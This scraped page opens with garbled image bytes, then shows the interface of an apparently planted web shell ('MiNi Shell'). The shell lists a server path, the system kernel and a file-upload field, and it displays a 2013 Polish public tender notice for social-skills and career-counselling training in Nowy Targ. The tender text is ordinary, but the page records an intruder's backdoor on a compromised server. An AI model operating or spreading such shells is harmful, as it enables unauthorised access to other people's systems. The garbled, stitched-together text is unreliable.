JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/303404-N-2013.html

<p class="kh_header"><b>Nowy Targ: Zorganizowanie i przeprowadzenie zajęć w zakresie Treningu kompetencji i umiejętności społecznych oraz doradztwa zawodowego dla uczestników projektu systemowego pn. SZANSA NA AKTYWNOŚĆ Program aktywizacji społecznej i zawodowej mieszkańców miasta Nowy Targ</b><br>
<b>Numer ogłoszenia: 303404 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Kościuszki 8, 34-400 Nowy Targ, woj. małopolskie, tel. 18 266 25 93, faks 18 266 25 93.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.nowytarg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie zajęć w zakresie Treningu kompetencji i umiejętności społecznych oraz doradztwa zawodowego dla uczestników projektu systemowego pn. SZANSA NA AKTYWNOŚĆ Program aktywizacji społecznej i zawodowej mieszkańców miasta Nowy Targ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyłonienie Wykonawcy, którego zadaniem będzie zorganizowanie i przeprowadzenie w okresie miesięcy: 

dla części I 
- zajęcia grupowe: gr. I  02.09.203 r. do 06.09.2013 r.
                            gr. II 09.09.2013 r. do 13.09.2013 r. 
- zajęcia indywidualne: wrzesień - grudzień 2013 r., 

dla części II
- zajęcia grupowe: gr. I 02.09.203 r. do 04.09.2013 r.
                            gr. II 09.09.2013 r. do 11.09.2013 r. 
- zajęcia indywidualne: wrzesień - listopad 2013 r.


Część I. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie Treningu kompetencji i umiejętności społecznych. Warsztaty mają być realizowane dla ok 16 osób, skierowanych przez Zamawiającego z podziałem na dwie grupy. Program warsztatów powinien obejmować 76 godzin zajęć grupowych - 38 godzin na grupę  oraz 28 godzin zajęć indywidualnych, po 2 godziny zajęć indywidualnych dla 14 uczestników projektu i składać się z zajęć teoretycznych i ćwiczeń praktycznych (łącznie 104 godziny - zajęć grupowych i indywidualnych).
a) Okres realizacji warsztatów: zajęcia grupowe - I grupa (8 os.) termin od 02.09.2013 r. do 06.09.2013 r.; II grupa (8 os.) termin od 09.09.2013 r. do 13.09.2013 r., zajęcia indywidualne: od września do grudnia 2013 r., po wcześniejszym uzgodnieniu z Zamawiającym.
b) Przez godziny dydaktyczne rozumie się: 45 min. zarówno dla zajęć teoretycznych, jak i praktycznych.
c) Warsztaty będą odbywać się na terenie miasta Nowy Targ, w sali wskazanej przez Zamawiającego. 
d) Wykonawca musi posiadać odpowiednie oprzyrządowanie techniczne, w tym: 
- aparaturę audiowizualną,
- rzutnik pisma,
- tablica flipchart, tablica naścienna lub tablica informacyjna foliowo - magnetyczna. 
e) Wykonawca musi zabezpieczyć słuchaczom dostęp do materiałów tematycznie związanych z prezentowanym na zajęciach materiałem teoretycznym, w tym min. do:
- zdjęć, plansz dydaktycznych oraz ilustracji;
- zestawów foliogramów; 
- podręczników, czasopism i literatury fachowej oraz odpowiednich przepisów prawnych.
f) Wykonawca jest zobowiązany zagwarantować uczestnikom warsztatów profesjonalne przygotowanie teoretyczno - praktyczne.
g) Program nauczania powinien odpowiadać wymogom określony w § 5 Rozporządzenia Ministra Edukacji i Nauki z dnia 03 lutego 2006 r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ( Dz. U. Nr 31 z 2006 r. Poz. 216 ).
h) Warsztaty powinny zakończyć się wydaniem odpowiedniego dokumentu stwierdzającego ukończenie przedmiotowego warsztatów tj. certyfikat lub zaświadczenie
i) Specjaliści realizujący program merytoryczny powinni mieć praktyczną i teoretyczną wiedzę w zakresie prezentowanego tematu, wynikającą z wykonywanego zawodu lub pełnionej funkcji.
j) Każdy uczestnik musi otrzymać na własność najpóźniej przed rozpoczęciem danego wykładu ( prezentacji, spotkania ) materiały merytoryczne, zawierające najważniejsze informacje omawiane na wykładzie.
k) Wykonawca zobowiązany jest zapewnić słuchaczom: barek kawowy tj. minimum: kawa, woda mineralna, herbata, ciastka itp. 
l) Zamawiający nie dopuszcza zlecenia realizacji zamówienia w całości lub w części podwykonawcom.
m) Wykonawca odpowiedzialny będzie za:
- przygotowanie szczegółowego konspektu do zajęć,
- zapewnienie materiałów biurowych, eksploatacyjnych i dydaktycznych dla uczestników,
- zapewnienie nadzoru nad organizacją warsztatów i realizacją programu merytorycznego,
- ubezpieczenie uczestników warsztatów na okres jego trwania od następstw NW,
- listy obecności,
- sprawozdanie z realizacji zajęć,
- CV oraz kwalifikacje osób prowadzących zajęcia,
- oznaczenia materiałów szkoleniowych- materiały winny być oznaczone zgodnie z wytycznymi dotyczącymi oznaczeń projektów w ramach Programu Operacyjnego Kapitał Ludzki, udostępniane przez Zamawiającego.

Część II. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usługi pn. Doradztwo Zawodowe. Warsztaty mają być realizowane dla ok 16 osób, skierowanych przez Zamawiającego z podziałem na dwie grupy. Program warsztatów powinien obejmować 36 godzin zajęć grupowych - 18 godzin na grupę oraz po 2 godziny zajęć indywidualnych dla 15 uczestników projektu (łącznie 66 godzin - zajęć grupowych i indywidualnych). 
a) Okres realizacji szkolenia: zajęcia grupowe - I grupa (8 os.) termin od 02.09.2013 r. do 04.09.2013r.; II grupa (8 os.) termin od 09.09.2013 r. do 11.09.2013 r., zajęcia indywidualne - od września do listopada 2013 r., po wcześniejszym uzgodnieniu z Zamawiającym.
b) Przez godziny dydaktyczne rozumie się: 45 min. zarówno dla zajęć teoretycznych, jak i praktycznych.
c)	Warsztaty będą odbywać się na terenie miasta Nowy Targ, w sali wskazanej przez Zamawiającego. 
d) Wykonawca musi posiadać odpowiednie oprzyrządowanie techniczne
- aparaturę audiowizualną,
- rzutnik pisma
- tablica flipchart, tablica naścienna lub tablica informacyjna foliowo - magnetyczna.
e) Wykonawca musi zabezpieczyć słuchaczom dostęp do materiałów tematycznie związanych z prezentowanym na zajęciach materiałem teoretycznym, w tym min.:
- zdjęć, plansz dydaktycznych oraz ilustracji;
- zestawów foliogramów; 
- podręczników, czasopism i literatury fachowej oraz odpowiednich przepisów prawnych.
f) Wykonawca jest zobowiązany zagwarantować uczestnikom warsztatów profesjonalne przygotowanie teoretyczno - praktyczne.
g) Program nauczania powinien odpowiadać wymogom określony w § 5 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ( Dz. U. Nr 31 z 2006 r. poz. 216 ).
h) Szkolenia powinny zakończyć się wydaniem odpowiedniego dokumentu stwierdzającego ukończenie przedmiotowego szkolenia tj. certyfikat lub zaświadczenie.
i) Specjaliści realizujący program merytoryczny powinni mieć praktyczną i teoretyczną wiedzę w zakresie prezentowanego tematu, wynikającą z wykonywanego zawodu lub pełnionej funkcji.
j) Każdy uczestnik musi otrzymać na własność najpóźniej przed rozpoczęciem danego wykładu ( prezentacji, spotkania ) materiały merytoryczne, zawierające najważniejsze informacje omawiane na szkoleniu.
k) Wykonawca zobowiązany jest zapewnić słuchaczom: barek kawowy tj. minimum: kawa, woda mineralna, herbata, ciastka itp.
l) Zamawiający nie dopuszcza zlecenia realizacji zamówienia w całości lub w części podwykonawcom.
m) Wykonawca odpowiedzialny będzie za:
- przygotowanie szczegółowego konspektu do zajęć,
- zapewnienie materiałów biurowych, eksploatacyjnych i dydaktycznych dla uczestników,
- zapewnienie nadzoru nad organizacją warsztatów i realizacją programu merytorycznego,
- ubezpieczenie uczestników warsztatów na okres jego trwania od następstw NW,
- listy obecności,
- sprawozdanie z realizacji zajęć,
- CV oraz kwalifikacje osób prowadzących zajęcia,
- oznaczenia materiałów szkoleniowych - materiały winny być oznaczone zgodnie z wytycznymi dotyczącymi oznaczeń projektów w ramach Programu Operacyjnego Kapitał Ludzki, udostępniane przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich trzech lat, przeszkolił co najmniej, po 2 osoby dla każdej z części osobno (w zależności na jakie części zostanie złożona oferta).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje specjalistami posiadającymi wiedzę teoretyczną oraz przygotowanie praktyczne w zakresie tematyki zajęć.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ
- formularze ofertowe, stanowiące załączniki nr 1 do SWIZ,
- wykaz osób do kontaktu, według załącznika nr 8 do SIWZ
- wypełniony program szkoleniowy załącznik nr 9 do SIWZ (dla każdej części oddzielnie)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy w realizacji szkoleń objętych zamówieniem - 30</li>
<li>3 - Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w następujących okolicznościach:
zaistnienie, po zawarciu umowy, w przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy, 
- którego nie można uniknąć ani któremu strony nie mogły zapobiec,

Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: 
- powódź, 
- pożar, i inne klęski żywiołowe, 
- zamieszki, strajki, ataki terrorystyczne, działania wojenne, 
- nagłe załamanie warunków atmosferycznych, 
- nagłe przerwy w dostawie energii elektrycznej, 
- promieniowanie lub skażenia.

Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia:
- Powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
- Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji umowy oraz terminy wynikające z harmonogramu;
- Gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - 
Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.nowytarg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej 
ul. Kościuszki 8
34 - 400 Nowy Targ
w sekretariacie pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2013 godzina 14:00, miejsce: Ośrodek Pomocy Społecznej 
ul. Kościuszki 8
34 - 400 Nowy Targ
w sekretariacie pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pn. SZANSA NA AKTYWNOŚĆ Program aktywizacji społecznej i zawodowej mieszkańców miasta Nowy Targ,
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie zajęć w zakresie -Treningu kompetencji i umiejętności społecznych- dla uczestników projektu, będących klientami Ośrodka Pomocy Społecznej w Nowym Targu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty mają być realizowane dla ok 16 osób, skierowanych przez Zamawiającego z podziałem na dwie grupy. Program warsztatów powinien obejmować 76 godzin zajęć grupowych - 38 godzin na grupę  oraz 28 godzin zajęć indywidualnych, po 2 godziny zajęć indywidualnych dla 14 uczestników projektu i składać się z zajęć teoretycznych i ćwiczeń praktycznych (łącznie 104 godziny - zajęć grupowych i indywidualnych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy w realizacji szkoleń objętych zamówieniem - 30</li>
<li>3. Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usługi pn. - Doradztwo Zawodowe -..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty mają być realizowane dla ok 16 osób, skierowanych przez Zamawiającego z podziałem na dwie grupy. Program warsztatów powinien obejmować 36 godzin zajęć grupowych - 18 godzin na grupę oraz po 2 godziny zajęć indywidualnych dla 15 uczestników projektu (łącznie 66 godzin - zajęć grupowych i indywidualnych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy w realizacji szkoleń objętych zamówieniem - 30</li>
<li>3. Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com